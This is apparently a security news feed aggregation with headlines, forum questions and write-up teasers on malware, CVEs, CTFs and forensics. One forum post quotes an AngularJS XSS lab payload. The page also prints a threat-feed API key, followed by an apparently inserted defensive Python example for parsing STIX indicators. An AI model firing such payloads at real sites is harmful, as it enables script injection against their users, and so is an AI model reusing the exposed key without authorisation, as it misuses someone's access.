    submitted by /u/pat_ventuzelo [link] [comments]

    State Council issues the "Opinions of the General Office of the State Council on Accelerating the Expansion of Electronic Certificate Application Areas and Nationwide Interoperability and Mutual Recognition"
    The Opinions comprise five chapters and eighteen articles; they balance development and security, strengthen standardized management across the whole process of electronic certificate use, strictly protect trade secrets and personal information, and firmly build a line of defense for the secure use of electronic certificates.
    New banking trojan targets UK bank customers through the Google Play store
    Researchers at Dutch security firm Threat Fabric have discovered a new Android banking trojan named Xenomorph that is targeting the customers of 56 European banks.
    FreeBuf Morning Report | Meta may exit Europe over data transfer difficulties; online litigation and other judicial activities must protect personal privacy
    Meta has received a "revised" preliminary decision from the EU's lead privacy regulator that could affect its transfers of EU user data to the US and could even lead it to exit the European market.
    Managing the lifecycle of non-human accounts to minimize cyberattacks
    For many organizations, the access rights of non-human accounts typically remain unchanged. This gives cybercriminals the opportunity to exploit orphaned accounts for unauthorized access and to launch cyberattacks.
    Dozens of OpenSea users have NFTs stolen, losses exceed US$1.7 million
    Dozens of OpenSea users fell victim to a phishing attack and lost NFTs worth about US$1.7 million.
    Android users beware! Hackers use "disposable" accounts to run scams
    A botnet-based rogue website has been linked to thousands of infected Android phones, once again exposing the weakness of relying on SMS for account verification.
    Watch the CIS 2021 Spring edition livestream on March 9 and win prize after prize!
    From March 9 to 10, the full-agenda livestream of the CIS 2021 Spring edition officially begins, and the benefit activities launch ahead of it; participants can win up to an iPhone 13!
    Cookware giant Meyer discloses cyberattack affecting employees
    Meyer Corporation, the world's second-largest cookware distributor, disclosed to the US Attorney General's Office a data breach affecting thousands of its employees.

    Behind-the-Scenes of Infosec Writeups
    No content preview
    Suspicious USB Stick
    No content preview
    CryptoWall Ransomware — Malware Traffic Analysis
    No content preview
    [THM] Dav Writeup
    No content preview
    How I could’ve bypassed the 2FA security of Instagram once again?
    No content preview

    Iran-aligned threat actor TunnelVision actively exploiting the Log4j2 vulnerability in VMware Horizon
    Translator: Knownsec 404 Lab translation team Original link: https://www.sentinelone.com/labs/log4j2-in-the-wild-iranian-aligned-threat-actor-tunnelvision-actively-exploiting-vmware-horizon/ Summary SentinelLabs has been tracking an Iran-aligned threat actor that is active in the Middle East and the US....

    Fun ideas for physical pentesting?
    Hey team! So my sec team started a physical security assessment a week ago and it's been fun. I got to use the under-the-door tool, tailgate, clone an RFID card and bypass motion sensor entrances/exits. I was wondering if you guys had any ideas about what you would do if you had “keys to the kingdom” such as the server room or someone's desktop? Edit: grammar submitted by /u/Enes_24 [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Automating a Red Team lab with Packer, Terraform and Ansible
    submitted by /u/nickonos [link] [comments]
    Reading and Writing into Process's Memory
    Get a basic understanding of reading and writing remote process memory using only the Win32 API and create your own game hacks. https://tbhaxor.com/reading-and-writing-into-processs-memory/ submitted by /u/tbhaxor [link] [comments]
  • Open

    Comprehensive collection of Bionicle Lego images
    submitted by /u/limb_fed [link] [comments]
    Electronic music and Drum 'n' Bass samples
    http://doa.totallyowns.co.uk/ submitted by /u/CalmWater8439 [link] [comments]
    13 Years of Weird Adult Forum Stuff - Organized by YYMM
    submitted by /u/Rose_Beef [link] [comments]
  • Open

    Command line execution fuzzer and bruteforcer (Equivalent of wfuzz for all command line)
    submitted by /u/cryptaureau [link] [comments]
    Wrote a new blog post on injecting fake credentials into lsass memory using New-HoneyHash and alerting with Elastic.
    submitted by /u/m_edmondson [link] [comments]
    My first vulnerability - Arista gNMI authentication bypass CVE-2021-28500
    submitted by /u/MilesTails [link] [comments]
    Finding an unseen SQL Injection by bypassing escape functions in mysqljs/mysql
    submitted by /u/toyojuni [link] [comments]
    Find You: Building a stealth AirTag clone
    submitted by /u/breakingsystems [link] [comments]
    CodeCat is an open-source tool to help you find/track user input sinks and bugs using static code analysis. These points follow regex rules.
    submitted by /u/CoolerVoid [link] [comments]
    Plone Scanner Version 0.01
    submitted by /u/halencarjunior [link] [comments]
    nrich: a new tool to quickly find open ports and vulnerabilities via Shodan
    submitted by /u/0xdea [link] [comments]
    Linux kernel NFC Use-After-Free (CVE-2021-23134) PoC
    submitted by /u/awarau888 [link] [comments]
  • Open

    Healing blind injections
    What if I told you there is a way to heal blind SQL injections and turn them into healthy union-based ones? Continue reading on Medium »
    eCPTX Exam Review by 0xJin
    eLearnSecurity Certified Penetration Tester eXtreme Continue reading on Medium »
    What an injection into jQuery-selector can lead to
    ​I somehow came across a page with something like a user survey (the program is private, so I will speak abstractly). Continue reading on Medium »
    XSS in hidden input field
    Hello again! I’m faizan and today I’m writing about an XSS I found in an input field which was hidden from the page using Content division… Continue reading on Medium »
    Parameter Tampering
    First, What is the Parameter Tampering? Continue reading on Medium »
    How I found broken link hijack using Python
    Disclaimer Continue reading on Medium »
    How I could’ve bypassed the 2FA security of Instagram once again?
    … Continue reading on InfoSec Write-ups »
    Attacking Kerberos | Kerberoasting | AS-REP Roasting | Active Directory | Windows |
    This blog covers how to attack Kerberos with Kerberoasting and AS-REP Roasting attacks. Continue reading on System Weakness »
    Polygon Consensus Bypass Bugfix Review
    Summary Continue reading on Immunefi »
  • Open

    I was solving an XSS lab on PortSwigger when I came across this JS payload; could anyone please explain to me how it works? [ {{$on.constructor('alert(1)')()}} ]
    Here is the link to the lab : https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression submitted by /u/_JatinChopra_ [link] [comments]
    Are there any sites with clear information about specific CVEs and how they can be exploited?
    It seems a lot of these sites that I am finding are very vague about the different vulnerabilities. It would be helpful to find a place where I can search the CVE and they can tell me how it is vulnerable and how it can be exploited. submitted by /u/Ok-Oil2953 [link] [comments]
    How are you tracking and documenting SIEM use cases?
    Curious to see what solutions folks have for documenting and tracking SIEM use cases. Are you just throwing everything into a spreadsheet? Using a KB tool like Confluence? Do you have a formalized process for handling changes to rules or retiring them? submitted by /u/wowneatlookatthat [link] [comments]
    SSH: Which server gets which keys to work?
    Sorry if this is a bit of a basic question but I’m setting up my first headless server and could use your advice. I have a server which I’d like to access via SSH. I have created a password protected key file to do so. I will be accessing the server from a few different clients, all belonging to me and no-one else. Is it correct to only have the public key on the server, and to have both the private and public keys on the clients? Or does the server need the private key? Is it even possible for the client to work without both the public and private keys available to it…? submitted by /u/JamieOvechkin [link] [comments]
    Common security-centric query languages?
    I'm working on a personal project relating to security-centric query languages, and I'm trying to get an overview of current (popular) languages. So far, I've got: Splunk Search Processing Language Falcon Query Language Microsoft Kusto Rapid7 Log Entry Query Language Are there other major languages in use currently? submitted by /u/QuirkySpiceBush [link] [comments]
    Receiving OTPs and verification links for different websites from the same number
    Hi all, I recently noticed that I am getting the OTPs/reset links for different websites (such as Instagram and Amazon) from the same number. That is, the password reset link for Instagram was sent to my phone from the same number as the verification link for Amazon. The number is something like 78549659. Is this normal, or does each company have a different number for sending such texts? submitted by /u/Euphoric_Asparagus90 [link] [comments]
    SANS SEC522 vs SEC542
    Hey everyone. My employer is paying for me to do a SANS certificate of my choosing, I'm interested in the web/appsec based certs. I was wondering if anyone's taken either of these or would recommend one over the other. Thanks submitted by /u/n3v327311 [link] [comments]
  • Open

    How dangerous is being a digital forensic investigator?
    I am currently doing a BSc in Information Systems and want to do a master's in digital/computer forensics. submitted by /u/SkillKiller3010 [link] [comments]
    Why do some investigations take longer and some shorter?
    I often read in news articles that some suspects have been arrested for internet crimes after a “months-long investigation”. Why does it take months if they already have so-called evidence, especially if they have received tips on it from organizations such as NCMEC? submitted by /u/Ill-Date-1852 [link] [comments]
    Fargate incident response
    How do we isolate affected containers for AWS ECS/EKS in fargate? Creating a new security group for ECS will result in new tasks being recreated to replace the old tasks, so the affected tasks won't be preserved. In EKS, there is no visibility into the security groups of the node. The only way to isolate is through the ACL which is not very ideal as there may be other apps using the same ACL. submitted by /u/SnooKiwis8248 [link] [comments]
    For research - breaking into Computer/Digital Forensics?
    Hey all - hope you're doing well. Doing some research on the Computer/Digital forensics field for a friend - I've looked a bit across Google, postings on job sites, etc. but wanted to get some knowledge from this pretty extensive community! How would someone with an M.A. (Masters) break into Computer or Digital forensics? Is a certification or class worth it (i.e. classes on Udemy, Coursera for specializations, or a university/online bootcamp program on digital or computer based forensics) What is your day-to-day like, how did you get into the field/how do you like it? What are common tools and skills - how much of a technical or IT background is required? Thank you! submitted by /u/sora1493 [link] [comments]
  • Open

    An Accidental SSRF Honeypot in Google Calendar
    This is a story of what both I and Google engineers considered to be an SSRF vulnerability in Google Calendar — but turned out to be some… Continue reading on Medium »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on ITNEXT »
    Exploiting XXE Vulnerabilities
    Original Post : https://keiran.scot/2022/02/10/exploiting-xxe-vulnerabilities/ Continue reading on Medium »
  • Open

    SecWiki News 2022-02-21 Review
    SecWiki Weekly (Issue 416) by ourren; Introduction to Vulnerability Exploitability eXchange (VEX) by ourren; PAM 2022 accepted papers list by ourren. For more recent articles, visit SecWiki
  • Open

    OWASP-LPU CTF: OSINT
    Continue reading on Medium »
    Walkthrough — Hacktoria: Geolocation 14
    And here we go to Hacktoria’s geolocation number 14 challenge! They keep on coming and I keep on solving them. So without further ado… Continue reading on Medium »
    Never Forget The Moon — OSINT Challenge 18
    On Dec 28, 2021, Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective was simple. We had to figure out when… Continue reading on Medium »
    Capture The Talent — OSINT Write-ups
    The Capture The Talent CTF took place from Saturday 19 to Sunday 20 February 2022. 🏆 Final ranking: 1/52 Continue reading on Medium »
  • Open

    De-anonymize anonymous tips through the Tumblr blog network
    Automattic disclosed a bug submitted by ajoekerr: https://hackerone.com/reports/1484168 - Bounty: $450
    Remote memory disclosure vulnerability in libcurl on 64 Bit Windows
    curl disclosed a bug submitted by nsq11: https://hackerone.com/reports/1444539
    Page has a link to google drive which has logos and a few customer phone recordings
    Zomato disclosed a bug submitted by codersanjay: https://hackerone.com/reports/864712 - Bounty: $200
  • Open

    AntiFuzz: Impeding Fuzzing Audits of Binary Executables
    Article URL: https://neverworkintheory.org/2022/02/21/antifuzz.html Comments URL: https://news.ycombinator.com/item?id=30414501 Points: 9 # Comments: 1
  • Open

    FreeBuf Morning Report | Douban app screenshots reportedly contain sensitive personal information; attackers distribute trojans via NFT topics
    Douban was found to embed a hard-to-notice invisible watermark in its pages; the watermark contains the user's UID, TID and a full timestamp with time zone.
    Huayun'an ASM technical series: a detection model for zero-day attacks (VEAM)
    At least 66 in-the-wild zero-day vulnerabilities were found in 2021, roughly twice the number found in 2020.
    Users of UK digital bank Monzo targeted by phishing
    UK digital banking platform Monzo is being targeted by phishing attacks; users have received SMS messages containing phishing links.
    NFTs worth millions of dollars stolen in an attack; Google issues urgent warning to 3.2 billion users worldwide | Global cybersecurity hotspots, February 21
    Global cybersecurity hotspots for February 21.
    New report | Sangfor 2021 ransomware landscape report
    New report released!
    White House attributes Ukraine DDoS attacks to Russian GRU hackers
    The recent DDoS attacks on Ukraine are said to be Russian-led hacking attacks.
  • Open

    Linux Kernel Use-After-Free (CVE-2021-23134) PoC
    Article URL: https://ruia-ruia.github.io/NFC-UAF/ Comments URL: https://news.ycombinator.com/item?id=30413955 Points: 1 # Comments: 0
  • Open

    Database connection exploitation tool: Sylas
    Author: ryze@nop. This article is a reader submission; Seebug Paper looks forward to your contributions, and accepted submissions receive a gift! Submission email: paper@seebug.org. 0x00 Introduction: during a red team engagement, after obtaining an Oracle database password and connecting with a database exploitation tool from GitHub, running commands such as tasklist /svc and net user produced the error ORA-24345: a truncation or null fetch error occurred, and the file management functionality...
    Analysis of Oracle WebLogic CVE-2022-21350
    Author: MoYun Tech VLab Team. Original: https://mp.weixin.qq.com/s/fFx1kQVfotbOqHlSjSJVMQ Vulnerability overview: this is a deserialization vulnerability based on a new gadget chain, which can lead to RCE on older JDK versions. Analysis: test environment WebLogic 14c with JDK 1.8. First, BadAttributeValueExpException.read...
  • Open

    Why does my app send network requests when I open an SVG file?
    No content preview
    How to Setup MFA for Linux Machine
    No content preview
    Walkthrough — Hacktoria: Geolocation 12
    No content preview
    Send an Email to me and get kicked out of Google Groups!!
    No content preview
  • Open

    Using Dynamic Time Warping (DTW) for time-series similarity measurement and identifying similar pollutant concentrations upstream and downstream of a river - 鸣梦
    Time-series similarity measures: the common methods are Euclidean distance (ED) and Dynamic Time Warping (DTW). They fall into two classes: lock-step measures and elastic measures. Lock-step measures are time  ( 1 min )
    Be careful opening online PDFs - 踩刀诗人
    This post is a small supplement to the earlier security remediation topic; if you are interested in the earlier content, use these shortcuts: Security Vulnerability Remediation Series (2), Security Vulnerability Remediation Series (1). Background: not long ago a customer ran another round of security testing on the system we provide, and one finding I found really interesting, which changed my understanding: "XSS injection in the PDF preview". I am sharing it here so we can learn from each other
    What does a CTO (technical director) actually do day to day? - 程序员守护石
    ​I am currently founding a startup; my last role was general manager of the R&D center at a medical technology company, and before that I held R&D/technical director roles at several companies. As far as I can tell, small and medium-sized companies in China do not draw a clear functional distinction between the CTO and technical director roles. 1. Summary first. A brief summary of what a CTO/technical director does: ❶ the CTO/technical director should have overall control of the company's technical direction, and also
    How SparkSQL supports enterprise data warehouses - 字节跳动数据平台
    Enterprise data warehouse architecture design and selection should be considered along the dimensions of development convenience, ecosystem, decoupling, performance and security. Author: 惊帆, from the Data Platform EMR team. Preface: after years of development, Apache Hive has essentially become the industry's de facto standard and data-processing tool for building very large data warehouses; Hive is no longer just a technical component but a design  ( 4 min )
    WeChat first-round interview: what is consistent hashing? Where is it used? What problem does it solve? - 小林coding
    Hi everyone, I'm Xiaolin. While browsing interview write-ups on Nowcoder, I saw that a candidate interviewing at WeChat was asked this question: what is consistent hashing, where is it used, and what problem does it solve? It's an interesting question, so let's talk about it today. Let's go! How are requests distributed? Most websites are certainly backed by more than one server, because a single machine's concurrency and data capacity are limited  ( 1 min )
    How to integrate Huawei Cloud Functions in Flutter - 华为开发者论坛
    Introduction: Cloud Functions is a serverless compute service providing FaaS (Function as a Service) capabilities; it helps developers greatly simplify application development and operations, lowers the barrier to implementing application features, and speeds up building business capabilities. Below is how to integrate Cloud Functions in the Flutter framework. Integration steps: 1. Install the Flutter environment  ( 1 min )
    JVM basics (2): memory allocation strategies and garbage collection - Huangzzzzz
    Between Java and C++ stands a high wall built of dynamic memory allocation and garbage collection: those outside want in, those inside want out. Garbage collection overview: the heap and method area of the Java memory model are the focus of garbage collection, since the other regions are reclaimed automatically when their thread ends. The first goal of garbage collection is deciding whether an object is no longer needed so that it can be automatically
    [Cao Gong's notes] Understanding the Mysql-Connector-Java time zone problem: times written to the database are always 13 hours behind - 三国梦回
    Background: last year I wrote "[Cao Gong's notes] Why is the time in the MySQL client a full 13 hours off from local time? Ridiculous", and recently it actually came in handy. Not for me, but for a teammate who had the same thing: a service inserts records into the database, and the records contain a time, say time A. After writing, the time in the database is A-13, 13 hours behind. So he changed this one place  ( 1 min )
    "Wu Wei" Python basics 44: operations on files and folders - 繁华似锦Fighting
    1. The os module: it provides interface functions for most operating-system features. Once imported, it adapts to the operating system platform and performs the corresponding operations. In Python programming, the os module handles the file and directory tasks we would otherwise do by hand, such as listing all files in the current directory, deleting a file, getting a file's size, and so on. In Python  ( 1 min )
    Odd case: investigating blurry text caused by transform - ChokCoco
    On our pages we often run into this problem: the text or border in some region becomes especially blurry when displayed, like this (data anonymized): Normally it should look like this: Hmm, the full image may not make it obvious, so let's compare a detail; then it is very clear: When is this triggered? So when does this problem occur? On Google we can actually find  ( 1 min )
    LibOpenCM3 (1): setting up a command-line development environment on Linux - Milton
    LibOpenCM3 is a GPL-licensed (LGPL3) firmware library for the Cortex-M series, supporting STM32, Atmel and NXP microcontrollers. It targets the same space as CMSIS but provides more method interfaces, with implementation coverage between CMSIS and SPL. For the common STM32F1 series the code is already basically stable...  ( 3 min )
    Developing TypeScript with VS Code - 寻找无名的特质
    This post gives an overview of developing TypeScript with VS Code.  ( 1 min )
    Spring Environment: externalized configuration management in detail - 跟着Mic学架构
    Environment represents the runtime environment information of the whole Spring application; it has two key parts, profiles and properties. Profiles: everyone understands this concept by now; the most common use is selecting a different configuration context in the Spring container for different environments, for example development  ( 1 min )
    Building a Web Office suite from scratch (4): a new problem, z-index - 赵康
    Table of contents for the series "Building a Web Office suite from scratch". This is a blog series whose ultimate goal is an HTML Canvas-based Web Office suite similar to Microsoft Office, including documents, spreadsheets, slides and so on. The GitHub repo is at: https://g  ( 1 min )
    vivo server-side monitoring architecture design and practice - vivo互联网技术
    1. Business background: we live in an era of information explosion; information flows freely around the world on the tide of the Internet, producing all kinds of platform and software systems, and ever more business drives up system complexity. When a problem in a core business hurts the user experience and developers do not notice in time, it is already too late; or when a server's CPU keeps climbing or its disk fills up, operations staff need to  ( 1 min )
    A simple .NET microservice e-commerce system with Dapr (19): distributed transactions, the Saga pattern - a1010
    Earlier posts in this series covered one implementation of distributed transactions: exposing actor services in the cluster to make distributed transactions locally atomic. But actor services are a special case and not generally applicable. So today we cover another implementation, the Saga pattern, with code attached at the end for readers to review and comment on. Contents: 1. A simple .NET microservice  ( 1 min )
    Last week's highlights (2.14-2.20) - 博客园团队
    Top posts: · 2021 year in review | GrapeCity software development retrospective (part 2) (葡萄城技术团队) · Architecture evolution from MVC to DDD (木小丰) · 36k stars! A rising open-source web server with free HTTPS out of the box (削微寒) · ASP.NET Core 6 framework revealed, example 01: first programming experience (Art
    Private lightweight continuous integration and deployment, part 04: private code repository service, Gitea - 莫问今朝乄
    Note: all notes in this series are on GitHub and can be viewed there directly. The most popular enterprise private code repository is GitLab, and I originally planned to deploy GitLab as the private repository. But after deploying it I found GitLab used far too many resources; even after tuning it needed 3 GB of memory, so I had to drop that plan. Then I found G  ( 2 min )
    Microservices from code to k8s deployment, the complete series (4): user center - 万俊峰Kevin
    In this series we walk through a complete microservice practice, from requirements to launch, from code to k8s deployment, from logging to monitoring. The whole project is built with go-zero and basically includes go-zero plus some middleware written by the go-zero author; the tech stack is essentially go-zero's own components.  ( 1 min )
    Circular dependencies, part 4 → when circular dependencies meet BeanPostProcessor, love may blossom! - 青石路
    A light moment: the day I learned she was getting married, I didn't sleep all night; I drove 300 km to her building and slowly smoked a cigarette... It got cold, firecrackers went off, the wedding convoy arrived; she was beautiful in her wedding dress that day, truly beautiful! After following the convoy for a few kilometers I got a message from her: stop following, stop following, your tractor is too loud... Previously: I  ( 1 min )
  • Open

    How To Integrate or Query My Public STIX STIX2 TAXII Threat Actor Specific Threat Intelligence Feed In Your Firewall or Security Solution - An Analysis
    Dear blog readers, have you already pulled my public and free STIX/STIX2 TAXII threat intelligence feed using your and your organization's Lifetime API Key? In this post I elaborate and offer practical advice and links on how you can pull and integrate my daily updated STIX/STIX2 TAXII threat intelligence feed into your firewall or security solution, and how you can use your Lifetime API Key for my feed in Maltego to enrich your IoCs (Indicators of Compromise).
    Here's the Lifetime API Key for you and your organization: f8aa0cca-a0ac-4eff-9c03-1c86ad7aee93
    Portal: https://ddanchev.ngrok.io
    API: https://ddanchev.ngrok.io/graphql
    API documentation: https://luatix.notion.site/GraphQL-API-cfe267386c66492eb73924ef059d6d59
    API client: https://opencti-client-for-python.readthedocs.io/en/3.3.0/pycti/pycti.html
    API requirements: https://github.com/amr-cossi/opencti-maltego/blob/master/config.py.sample
    TAXII collection: https://ddanchev.ngrok.io/taxii2/root/collections/c2259b20-9c60-4ddd-8931-8de970440f06/objects
    Bearer token authentication required: https://github.com/OpenCTI-Platform/opencti/issues/1198
    Maltego transforms available:
    - https://www.maltego.com/downloads/
    - https://www.maltego.com/transform-hub/opencti/
    - https://www.maltego.com/transform-hub/stix/
    As always, feel free to drop me a line at dancho.danchev@hush.com if you have any questions.
    Full list of solutions compatible with STIX/STIX2 and TAXII: EventLog Analyzer, ThreatConnect, Azure Sentinel, Splunk, Cisco, Elemendar, Cortex XSOAR, TrendMicro, ArcSight, Microsoft Sentinel, EventTracker, Plixer Scrutinizer, Sumo Logic, Kaspersky CyberTrace, ServiceNow, CheckPoint ThreatCloud, Carbon Black EDR, Cisco Email Gateway, LogPoint, Tanium, Symantec, LogRhythm, Infoblox, Cloudera.
    Sample screenshots of my STIX/STIX2 TAXII threat intelligence feed in combination with Maltego (images not reproduced here). Enjoy!
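    An added example (mine, not code from the post above or from the OpenCTI or Maltego projects) of the consuming side of such a feed: given a TAXII 2.1 objects envelope of STIX 2.1 indicators, keep only the indicators that are still valid and written in the STIX pattern language, and flatten their observable values into per-type blocklists that a firewall or SIEM can load. The envelope, indicator IDs and timestamps are constructed sample data, not content of the author's feed; the `Authorization: Bearer` header is assumed to match the OpenCTI TAXII setup the post links to; and the code makes no network request.

```python
import re
from datetime import datetime, timezone

# Matches one comparison inside a STIX pattern, e.g.
#   ipv4-addr:value = '203.0.113.5'   or   file:hashes.'SHA-256' = '<hex>'
# and captures the observable type and the literal value.
STIX_PATTERN_RE = re.compile(
    r"(ipv4-addr|ipv6-addr|domain-name|url|file)"
    r":(?:value|hashes\.'?[A-Za-z0-9-]+'?)\s*=\s*'([^']+)'"
)


def taxii_headers(api_key: str) -> dict:
    """Request headers for a TAXII 2.1 objects endpoint that authenticates with a
    bearer token (assumption: this is how the OpenCTI-backed feed is exposed)."""
    return {
        "Accept": "application/taxii+json;version=2.1",
        "Authorization": f"Bearer {api_key}",
    }


def parse_stix_time(value: str) -> datetime:
    # STIX timestamps are RFC 3339 in UTC with a trailing 'Z'.
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def indicator_is_active(obj: dict, now: datetime) -> bool:
    """Honour revoked, valid_from and valid_until so stale IoCs age out."""
    if obj.get("revoked"):
        return False
    if parse_stix_time(obj["valid_from"]) > now:
        return False
    until = obj.get("valid_until")
    return until is None or parse_stix_time(until) > now


def extract_blocklist(envelope: dict, now: datetime) -> dict:
    """Return {'ipv4-addr': [...], 'domain-name': [...], ...} from the active
    STIX-pattern indicators in a TAXII envelope. Non-indicator objects and
    indicators in other pattern languages (snort, yara) are skipped, not mis-parsed."""
    found = {}
    for obj in envelope.get("objects", []):
        if obj.get("type") != "indicator":
            continue
        if obj.get("pattern_type", "stix") != "stix":
            continue
        if not indicator_is_active(obj, now):
            continue
        for obs_type, value in STIX_PATTERN_RE.findall(obj.get("pattern", "")):
            found.setdefault(obs_type, set()).add(value)
    return {k: sorted(v) for k, v in found.items()}


# Constructed sample data (documentation addresses, example.com domains, the
# SHA-256 of an empty file). IDs and dates are made up for the demo.
NOW = datetime(2022, 2, 22, tzinfo=timezone.utc)
SAMPLE_ENVELOPE = {
    "objects": [
        {"type": "indicator", "id": "indicator--0f4a3b9c-1b2e-4c3d-8e9f-000000000001",
         "pattern_type": "stix", "pattern": "[ipv4-addr:value = '203.0.113.5']",
         "valid_from": "2022-02-20T00:00:00Z"},
        {"type": "indicator", "id": "indicator--0f4a3b9c-1b2e-4c3d-8e9f-000000000002",
         "pattern_type": "stix",
         "pattern": "[domain-name:value = 'login.example.com' OR domain-name:value = 'cdn.example.net']",
         "valid_from": "2022-02-20T00:00:00Z", "valid_until": "2022-03-01T00:00:00Z"},
        {"type": "indicator", "id": "indicator--0f4a3b9c-1b2e-4c3d-8e9f-000000000003",
         "pattern_type": "stix", "pattern": "[url:value = 'http://198.51.100.7/update.bin']",
         "valid_from": "2022-02-10T00:00:00Z", "valid_until": "2022-02-21T00:00:00Z"},  # expired
        {"type": "indicator", "id": "indicator--0f4a3b9c-1b2e-4c3d-8e9f-000000000004",
         "pattern_type": "stix",
         "pattern": "[file:hashes.'SHA-256' = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']",
         "valid_from": "2022-02-20T00:00:00Z"},
        {"type": "indicator", "id": "indicator--0f4a3b9c-1b2e-4c3d-8e9f-000000000005",
         "pattern_type": "snort",
         "pattern": 'alert tcp any any -> any 4444 (msg:"constructed rule"; sid:1000001;)',
         "valid_from": "2022-02-20T00:00:00Z"},
        {"type": "malware", "id": "malware--0f4a3b9c-1b2e-4c3d-8e9f-000000000006",
         "name": "constructed sample", "is_family": False},
    ]
}

if __name__ == "__main__":
    for obs_type, values in extract_blocklist(SAMPLE_ENVELOPE, NOW).items():
        print(obs_type, values)
```

    The expired URL indicator and the snort rule never reach the blocklist, which is the check most worth having before feed content is pushed into an enforcement point: a firewall fed raw indicators keeps blocking addresses long after the feed has retired them. To fetch a real collection, send a GET to the collection's `/objects` URL with `taxii_headers(api_key)` and pass the decoded JSON body to `extract_blocklist`.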

  • Open

    Inventing Anna, social engineering and OSINT: what is the outlook for the future in terms of security…
    How much personal and intimate information do we share on social media spontaneously and without a second thought? Continue reading on Medium »  ( 3 min )
    Walkthrough — Hacktoria: Geolocation 13
    Thirteen. Unlucky for some. Let’s see how you could solve Hacktoria’s practice challenge: Geolocation 13. I confess I was very excited… Continue reading on Medium »  ( 3 min )
  • Open

    Analysis of CVE-2021-36260: Exploited in the Wild Hikvision Camera Vulnerability
    submitted by /u/chicksdigthelongrun [link] [comments]
    rconn - Consume services behind NAT or firewall without opening ports or port-forwarding
    submitted by /u/jafarlihi [link] [comments]  ( 1 min )
    Running Cobalt Strike BOFs from Python
    submitted by /u/naksyn_ [link] [comments]
  • Open

    Interesting Stored XSS
    Hey there! My name is Faizan and this write up is about an interesting Stored XSS I found earlier today! If you know what an XSS aka Cross… Continue reading on Medium »  ( 1 min )
    Give me a browser, I’ll give you a shell
    A restricted browser, that’s all you have… what do you do? Continue reading on Medium »  ( 3 min )
    Burp Suite Tool — Overview and Usage
    Burp Suite is an intercepting tool which can be used to capture and manipulate all of the data traffic between Client and Server. This… Continue reading on Medium »  ( 2 min )
    Send an Email to me and get kicked out of Google Groups!!
    A feature that almost broke Google Groups!! Continue reading on InfoSec Write-ups »  ( 3 min )
    How I make money with Hacking …
    Hello Everyone, This is Abhishek Kashniyal, I am a CSE student with specialization in Cyber Security & Forensics, a constant learner and… Continue reading on Medium »  ( 2 min )
    BugBounty: Algolia key disclosure vulnerability
    What is Algolia? Continue reading on Medium »  ( 1 min )
  • Open

    A bunch of rock music
    http://djbloom.info/Music/My%20Music/ submitted by /u/CalmWater8439 [link] [comments]  ( 1 min )
    I'm bad at coding. How do I create an Open Directory from scratch?
    Just what the title says. I have some music, movies, documents, etc that I'd like to share, but I don't want to take up or make an entire Google Drive account just for some files. Any help getting started would be greatly appreciated! submitted by /u/Reggie_Smith_89 [link] [comments]  ( 4 min )
  • Open

    I want to know what a day in the life looks like as an infosec analyst. Also, what would companies look for when hiring a junior infosec analyst?
    What would a company look for when hiring junior infosec analysts? I just started as a junior help desk technician and I hear that experience is better than certs. I just want to get an idea of what a company will look for when hiring a junior infosec analyst. Also, is it possible to go from help desk to infosec? submitted by /u/Jkarl0880 [link] [comments]  ( 1 min )
    Any suggestions for gaining resume-worthy experience in cloud security?
    I pivoted from a technical security role to a customer facing technical/management role for a cybersecurity SaaS company a couple years ago. I’ve been considering getting back into the security engineering/architect side of things. One area I’m finding seems to be a requirement for most roles is experience in cloud security like mastery of AWS. I’m also noticing requirements for experience in container tools such as Kubernetes. This isn’t experience I can gain on the job right now. Any suggestions on how I can get experience that matters for these technologies? I don’t want to fall behind and lose any chance of working in a direct security role again submitted by /u/7heJoker [link] [comments]  ( 1 min )
    SAP CVE-2022-22536 technical analysis?
    Anybody by some chance has some sources on the new CVE of score 10 impacting SAP NetWeaver? I can't find any details of the specific vulnerable mechanism that allowed the request smuggling. Thanks :) submitted by /u/Altiverses [link] [comments]  ( 1 min )
    What are the prerequisite skills/knowledge for reverse engineering?
    Trying to learn reverse engineering and binary exploitation and I came across this playlist. Watched a few videos but didn't get a thing; it feels like I'm missing some knowledge gaps in between. Can someone please give me a clear roadmap so that I can start using Radare2? Edit: after radare, I wanna learn Ghidra lol submitted by /u/The_Intellectualist [link] [comments]  ( 2 min )
    How is your day as an entry-level SOC
    I have recently interviewed for an entry-level SOC role, and my expectation is a bit mixed. It is a cybersecurity company that provides services such as SIEM monitoring, pen-testing, threat hunting, etc. The X company has 5 people, including the CEO and CTO. And around 300 customers. The role is to sit with the SOC team, check alerts, and then give customers a summary each quarter of what happened within that period. The job title was listed as a cyber security engineer, and the job description mentioned Analysis of security incidents Incident Response Teams Threat Hunting Security advice During the interview, they asked me two times specifically how I felt about giving security advice to customers, is it normal that the junior SOC gives security advice to customers? Or is this a good way to get into the "cyber world", then apply for new jobs after 1 year? Going to graduate with my BS this summer, so trying to land a job before I graduate. submitted by /u/PapiPoseidon [link] [comments]  ( 1 min )
  • Open

    The mischievous in-memory webshell: Servlet memory shells
    The last article on Servlet memory shells, starting directly from how the shell is loaded.  ( 1 min )
  • Open

    SecWiki News 2022-02-20 Review
    No news posted yet today~ For more recent articles, visit SecWiki  ( 2 min )
  • Open

    Telegram vs Cellebrite
    "Telegram for iOS: Access and decode secret chats which can only be accessed on their devices of origin. You can also recover deleted messages." I'm in too deep; this forensic thingy is kinda exciting, and I'm in a business major. I guess one can really recover deleted Telegram chats using Cellebrite! Amazing submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    Apple iCloud Productions
    What kind of data is included in Apple iCloud productions? Do they include permanently deleted files, notes, media? submitted by /u/b4dboyrere [link] [comments]  ( 1 min )
    jump from IT Audit into computer forensics
    Hello friends, to make things short: I am an IT Auditor with 1.5 years of experience, and I hate the part of dealing with people in IT Audit, but it's very essential to deal with people there. So I decided to jump to forensics. Do you people deal with humans, or simply have to worry about machines and that is it? And I am CISA certified; will that help? What certification do you suggest taking for computer forensics? And how is the pay for IT Audit vs computer forensics? In short, do you recommend the shift or not? Thx submitted by /u/ItchyPilot9804 [link] [comments]  ( 2 min )
  • Open

    [Cullinan #27] Improve cullinan and Added more..
